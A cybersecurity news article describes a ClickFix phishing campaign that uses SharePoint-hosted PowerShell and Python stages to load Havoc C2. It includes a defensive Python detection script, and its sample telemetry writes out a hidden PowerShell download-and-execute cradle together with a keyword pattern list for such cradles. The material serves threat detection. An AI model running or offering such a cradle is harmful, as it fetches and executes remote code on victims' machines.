Hackers deploy PowerShell-based Havoc C2 via SharePoint sites using Clickfix Trick

By Ravi Lakshmanan, March 3, 2025 (Cybercrime / Malware)

[Image: ClickFix trick]

Cybersecurity researchers are calling attention to a new phishing campaign that employs the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc.

“Threat actors hide each malware stage behind SharePoint sites and use a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted and well-known services,” Fortinet said.

The attack starts with a phishing email carrying an HTML attachment (“documents.html”) that displays a fake error message when opened. Using the ClickFix technique, the page instructs the user to copy a command and run it in a terminal or PowerShell window, and that command fetches the next stage.

The command is designed to download and execute a PowerShell script hosted on an adversary-controlled SharePoint server. The downloaded PowerShell script first checks whether it is running inside a sandbox environment and, if not, downloads the Python interpreter (“pythonw.exe”) unless one already exists on the system.

[Image: Havoc C2 via SharePoint site]

The next step is to fetch and run a Python script from the same SharePoint location. That script acts as a shellcode loader for KaynLdr, which is written in C and ASM and is capable of launching an embedded DLL (the modified Havoc Demon agent).

“Threat actors use Havoc in conjunction with the Microsoft Graph API to hide C2 communications within famous services,” Fortinet said, noting that the framework supports information gathering, file operations, command and payload execution, token manipulation, and Kerberos attacks.
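The infection chain above (user-pasted ClickFix command, PowerShell stager pulled from SharePoint, dropped pythonw.exe interpreter, C2 tunnelled through the Microsoft Graph API) is what a detection engineer would want to see as correlated telemetry. The following is an added example written for this page, not code from the article, Fortinet, or the Havoc project. The event field names are an assumption loosely modelled on Sysmon process-create and network-connect records; all hostnames, paths and PIDs in the sample events are constructed, and the list of processes expected to talk to graph.microsoft.com is an assumption that must be baselined per environment.

```python
"""Score a ClickFix -> PowerShell -> pythonw.exe -> Graph API chain from
process and network events. Added example; field names and sample data are
assumptions, not the article's or Fortinet's telemetry."""
import re

# Download-and-execute one-liners typically pasted by a ClickFix lure.
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|"
    r"\biwr\b|start-bitstransfer|\bcurl\b|\bwget\b)", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
HIDDEN_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass)", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
USER_LAUNCHERS = {"explorer.exe", "windowsterminal.exe"}   # Run dialog / desktop
TRUSTED_DIRS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")
# Assumption: processes that legitimately use Graph on a typical workstation.
GRAPH_BASELINE = {"outlook.exe", "teams.exe", "ms-teams.exe", "onedrive.exe",
                  "msedge.exe", "officeclicktorun.exe"}

# Constructed sample telemetry (not real captures).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PYW = r"C:\Users\alice\AppData\Local\Temp\py\pythonw.exe"
ATTACK_CHAIN = [
    # Stage 1: user pastes the ClickFix command into a shell opened from explorer.
    {"type": "proc", "pid": 4100, "ppid": 1200, "image": PS,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr '
                'https://contoso.sharepoint.com/sites/x/stage1.ps1 -UseBasicParsing)"'},
    # Stage 2: the stager drops an interpreter into a user-writable path and runs the loader.
    {"type": "proc", "pid": 4212, "ppid": 4100, "image": PYW, "parent_image": PS,
     "cmdline": r"pythonw.exe C:\Users\alice\AppData\Local\Temp\py\loader.py"},
    # Stage 3: the loaded Demon beacons over Microsoft Graph from that interpreter.
    {"type": "net", "pid": 4212, "image": PYW,
     "dest_host": "graph.microsoft.com", "dest_port": 443},
]
BENIGN_NOISE = [
    {"type": "net", "pid": 900, "dest_host": "graph.microsoft.com", "dest_port": 443,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"type": "proc", "pid": 5000, "ppid": 1200, "image": PS,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -NoProfile -c "Get-ChildItem C:\\logs | Measure-Object"'},
]
EVENTS = ATTACK_CHAIN + BENIGN_NOISE


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def clickfix_cradle(ev):
    """Stage 1: shell started from the user's desktop session running a download cradle."""
    if ev["type"] != "proc" or basename(ev["image"]) not in SHELLS:
        return None
    if basename(ev["parent_image"]) not in USER_LAUNCHERS:
        return None
    cmd = ev["cmdline"]
    urls = URL.findall(cmd)
    if not (DOWNLOAD_CRADLE.search(cmd) and urls):
        return None
    hidden = bool(HIDDEN_FLAGS.search(cmd))
    trusted_stager = any("sharepoint.com" in u.lower() for u in urls)
    sev = "high" if (hidden or trusted_stager) else "medium"
    return {"stage": "clickfix_cradle", "pid": ev["pid"], "severity": sev, "urls": urls}


def dropped_interpreter(ev):
    """Stage 2: python(w).exe spawned by a shell from outside trusted install directories."""
    if ev["type"] != "proc" or basename(ev["image"]) not in {"pythonw.exe", "python.exe"}:
        return None
    if basename(ev["parent_image"]) not in SHELLS:
        return None
    if ev["image"].lower().startswith(TRUSTED_DIRS):
        return None
    return {"stage": "dropped_interpreter", "pid": ev["pid"], "severity": "high",
            "image": ev["image"]}


def graph_unexpected_process(ev):
    """Stage 3: Graph API traffic from a process not in the per-host baseline."""
    if ev["type"] != "net" or ev["dest_host"].lower() != "graph.microsoft.com":
        return None
    if basename(ev["image"]) in GRAPH_BASELINE:
        return None
    return {"stage": "graph_unexpected_process", "pid": ev["pid"], "severity": "medium",
            "image": ev["image"]}


def detect(events):
    """Run every rule over every event; findings keep event order."""
    rules = (clickfix_cradle, dropped_interpreter, graph_unexpected_process)
    return [f for ev in events for rule in rules if (f := rule(ev))]


def lineage(pid, parent):
    """Yield pid and each ancestor PID known from process-create events."""
    seen = set()
    while pid is not None and pid not in seen:
        seen.add(pid)
        yield pid
        pid = parent.get(pid)


def correlate_chain(events, findings):
    """Group findings under the cradle PID that is an ancestor of their process."""
    parent = {ev["pid"]: ev["ppid"] for ev in events if ev["type"] == "proc"}
    roots = [f["pid"] for f in findings if f["stage"] == "clickfix_cradle"]
    return {r: [f for f in findings if r in set(lineage(f["pid"], parent))] for r in roots}


if __name__ == "__main__":
    found = detect(EVENTS)
    for root, stages in correlate_chain(EVENTS, found).items():
        print(root, [s["stage"] for s in stages])
```

Two caveats the chain makes obvious: rule 1 alone fires on legitimate admin cradles and rule 3 alone fires on any unbaselined Microsoft client, so the value is in the parent-PID correlation, which is why the stage 1 finding is the anchor. The sandbox check in the stager also means a detonation sandbox may never produce stages 2 and 3, so endpoint telemetry, not just sandbox verdicts, is needed to see the full chain.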

The development comes as Malwarebytes revealed that threat actors continue to exploit known loopholes in Google Ads policies, targeting PayPal customers with fake ads served through advertiser accounts that may have been compromised.

The ads attempt to trick victims searching for help with PayPal account issues or payment concerns into calling fraudulent support numbers, where they end up handing over personal and financial information.

“A weakness within Google’s policy of landing pages (also known as the final URL) allows anyone to impersonate a popular website as long as the landing pages and display URLs (web pages displayed in the ads) share the same domain,” says Jérôme Segura, senior director of research at Malwarebytes.

“Tech support scammers are like vultures circling above the most popular Google search terms, especially when it comes to all kinds of online support and customer service.”

© 2025 news.fyself. Designed by fyself.